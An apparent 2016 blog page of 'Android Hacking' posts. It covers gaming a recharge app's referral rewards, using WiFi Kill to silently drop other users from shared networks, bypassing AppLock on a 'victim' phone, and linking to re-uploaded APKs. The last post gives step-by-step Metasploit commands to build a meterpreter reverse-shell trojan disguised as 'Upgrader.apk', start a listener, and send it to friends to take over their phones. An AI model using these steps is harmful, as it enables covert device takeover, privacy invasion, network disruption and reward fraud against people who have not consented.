Showing posts with label Android Hacking. Show all posts
Showing posts with label Android Hacking. Show all posts

Sunday, 29 May 2016

Tricks To Get Unlimited Paytm By Simple Way 2016

»TaskBucks is the fastest growing For Giving FREE RECHARGE And Free PayTM Cash Do cool new Tasks and Earn Free Recharge & PayTM Cash on TaskBucks, best way to add to your pocket money.

»Download and Install The APK From The Links Given Below[important]​




Open App and Signup​ You’ll get Rs. 20 Bonus once you complete 2 offers​ Now Search “Browser” in play store and download any 5-10 browser’s​ Now Open Taskbucks again and Click on “Stories” tab.​

»Click on “Share to get ₹ X” of any story (Where X=4/5)​ Now click on whatsapp icon to share on whatsapp​ Now click on the group in which you are alone (you can easily make this type of group – 1st make group of two and then remove another person)​
»Now click on the link and open it 5-6 times in different browsers​ You will get notification that you have completed the offer and you have been rewarded​

»Now follow 3 to 8 steps for other stories and you will get Unlimited Recharge&Paytm Cash​ Also Download App And Complete Offers To Get Unlimited Recharge and Paytm Cash​ Enjoy & Share !​ ​

Downloads & Links:-

Click Here To Download Free Recharge App (Open in Android)

Tuesday, 24 May 2016

Tricks To Make Unlimited Calls To India And Other Countries 2016

Primo App – Get Unlimited Free Calls to India & Other Countries: Primo is the messaging app that’s also an alternative to expensive phone plans. You get the best of messaging apps and phone service with Primo.

Steps To get Free Calls from Primo app:-

Download Primo App From Here

Open the App create new account by entering all required details.
On next page, add your Mobile Number & verify it to get additional free minutes.
After successful verification, you can see free 25 minutes in your account.
Now go to Rewards Tab & grab more free minutes by completing below given tasks :
– Add Email Address & get 25 Free Minutes.
– Set Profile Photo & get 25 Free Minutes.
– Enter Location & get 25 Free Minutes.
– Enter Home Town & get 25 Free Minutes.
– Refer friends & get 25 Free Minutes per referrals.
Enjoy Free Calls!

Sunday, 22 May 2016

How To Kick Off Someone Who Connected Invisibly Using Wifi Kill On Android

In a public or open wi-fi network if a user consumes most of the band-width, then, the speed drops. So, it is very necessary to block the user from the wi-fi network. There arevarious methods to kick someone off a public wi-fi network. You can block the MAC address of the user and restrict him/her from wi-fi network. This is of-course a rude behaviour and don’t block anyone from the wi-fi network without warning him.

KICK OFF WI-FI USER FROM PUBLIC OR OPEN WI-FI NETWORK

METHOD 1:-

 USE WIFI KILL ANDROID APPLICATION TO BLOCK USERS

“WiFi Kill” is an android application that let you block other users of a same wi-fi network using Android device. The application needs root access for performing the task. It considers the device as a router and filter any MAC address and block the user’s MAC address.
The application is not available in Google play store. You can download the free version of ‘WiFi Kill’ and install the app in your phone. Open Wi-Fi Kill application icon, it opens and scans the network, then it shows you the complete list of all the connected devices with IP addresses in the application window. The application also displays the manufacturers details of each device connected to the network (you will not get any device name). Check the device IP that you want to block. Tap on it to get a pop up menu which shows three different reject method those are “drop policy”, “drop policy+reject target”, “drop policy+redirected to 127.0.0.1”.
WiFi Kill
“Drop policy” stops any downloads which are in progress in the associated device.
“Drop policy + Reject target” stops all the current downloads and stops all the future connections as well.
“Drop policy + Redirected to 127.0.0.1” redirects any attempting connection by the selected device to it’s own localhost. That mean, the device attempts to connect itself rather than connecting to the remote address. This option always shows the connection as active. But, you can’t open any page and it doesn’t show you any error.
According to me, third and last option is the best as it make the connection fake and the user does not have any clue regarding this.
Disclaimer note: This method is for education purposes only. We never encourage our readers to kick someone off your wi-fi network without any reason or without prior permission of network admin. Google also discontinue the application from the play store.
Download the application from here.

Tuesday, 12 April 2016

How To Hack AppLock In Victim Mobile Tricks 2016

AppLock android app without knowing password.
Note: This trick will not work if the settings is
locked by the admin.
To hack AppLock just follow these simple
steps.

1. Take the target phone in which you want
to hack AppLock.
2. Now go to settings and then tap
on Apps or Applications.
3. You will see AppLock app
under downloaded section and tap on it.
4. After that tap on Force stop option.
With this AppLock application is currently in idle
state. You can open locked apps without
entering password.
I hope you’ve have understood How to bypass
AppLock application in android devices

Sunday, 27 March 2016

Text Scanner Pro 2016


OCR - Text Scanner Pro v1.2.5
Requirements: 3.0 and up
Overview: It turns your mobile phone to text scanner.


OCR-Text Scanner is App to recognize text from image based on "tesseract" OCR.
It turns your mobile phone to text scanner.
Internet connection is not required to run this app.
Gave support for most of languages.

Contact me if your language is missing.
Please send mail if you find any bugs , issues or want any feature. Please don't rate less..

Note:Handwritten text will not work.

This app has no advertisements

https://userscloud.com/2a78hztb6b1t

Rpd and Vnc On Your Android Mobile(Jump Desktop v7.0) Official

Jump Desktop (RDP & VNC) v7.0

Requirements: Android 2.2+
Overview: Jump Desktop is a remote desktop application that lets you control your computer from your phone or tablet. Compatible with both RDP and VNC, Jump Desktop is secure, reliable and very easy to set up.


Features include a streamlined user interface that gives you the best possible remote desktop experience on any of your mobile setup and reliable:
Jump Desktop is very easy to configure; anyone can do it! Just visit: http://jumpdesktop.com/go on your PC or Mac and follow step-by-step instructions. You’ll be up and running in no time.
Secure and built on open standards:
Jump Desktop is a true RDP and VNC client with built-in support for encryption. It lets you connect to your computer using an IP address or hostname, if you already have RDP or VNC configured on it.
Powerful features:
Unleash the full power of your phone or tablet while connected to your computer. Multitouch ready - pinch-to-zoom and two finger scrolling make controlling your computer easy and productive. Jump's multi-threaded rendering engine has been fine tuned for Android. Jump's VNC and RDP engine is one of the fastest you'll find on Android.
If you need help, visit http://support.jumpdesktop.com or email us at: support@jumpdesktop.com

Limitations of the free version:
- Connect to one computer absolutely free with no feature restrictions. Upgrade to the paid version to get unlimited computers.
- Jump Desktop links are currently disabled (http://support.jumpdesktop.com/entries/20866081)
Features:
✓ Multi-protocol: supports RDP and VNC
✓ Multi-touch ready: Pinch-zoom, two finger scrolling, mouse dragging all supported. Even three finger taps are supported to quickly show and hide the keyboard.
✓ Easy and secure setup: Automatically configure your PC or Mac for remote access using Wi-Fi and 3G without worrying about your router settings. Set up as many computers as you like and manage them all using your Google account (optional)
✓ SSH Tunnel support (new!)
✓ The best external keyboard and mouse support on Android: Supports all external keyboard keys and shortcuts. Right mouse clicks supported too with external mice - all natural, PC like!
✓ Universal application: Works on tablets and phones - buy it only once and use it on all your Android devices
✓ Full support for multitasking: Switch to other apps without disconnecting
✓ Supports large custom screen resolution
✓ Full mouse support: left and right clicks, dragging, scrolling, precision pointer movement
RDP features:
✓ Touch redirection support for Windows 8 and Server 2012
✓ Tested on: Windows 2000, XP, Vista, Windows 7, Windows 8, Server 2003, Server 2008, Server 2008 R2, Server 2012, SBS Server
✓ Secure: 40/56/128bit RDP, TLS/SSL, FIPS and NLA authentication support
✓ Supports 8, 16 and 24-bit colors and all RDP performance options
✓ Multiple monitor support on Windows 7 and above
✓ Console sessions
✓ Audio streaming
VNC features:
✓ Tested with Mac OS X, TightVNC, RealVNC, UltraVNC, Linux (Ubuntu Remote Desktop)
✓ Secure: Supports SSL encryption when used with Jump's automatic setup instructions: http://jumpdesktop.com/go
✓ 8 and 16-bit color
✓ OS X Screen Sharing support
✓ Multiple monitor support
✓ Supported encodings: copyrect, zrle, tight, (zlib)hextile, zlib, rre, raw, desktop-resize

This app has NO advertisements

Download Instructions: Released by chathu_ac
https://userscloud.com/uaxqzfhecmfx

Thursday, 17 March 2016

How to Hack Android With Kali Linux 2016

This a completely noob friendly tutorial in each steps....
All that u need is just Kali Linux installed in your PC and a droid to hack....
This is a tutorial explaining how to hack android phones with Kali.

Step 1: Fire-Up Kali:

  •  Open a terminal, and make a Trojan .apk
  •  You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOSTwith your own IP)
  •  You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding....

Step 2: Open Another Terminal:

  •  Open another terminal until the file is being produced.
  •  Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  •  After it loads(generally takes some time), load the multi-handler exploit by typing : use exploit/multi/handler
  •  Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  •  To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  •  At last type: exploit to start the listener.
  •  Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  •  Then send it using Uploading it to Dropbox or any sharing website (like: http://www.speedyshare.com ).
  •  Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
* Let the Victim install the Up grader app(as he would think it is meant to upgrade some features on his phone)

* However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install and when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:
-----------------------------------------------------------------------------HACKED--------------------------------------------------------------------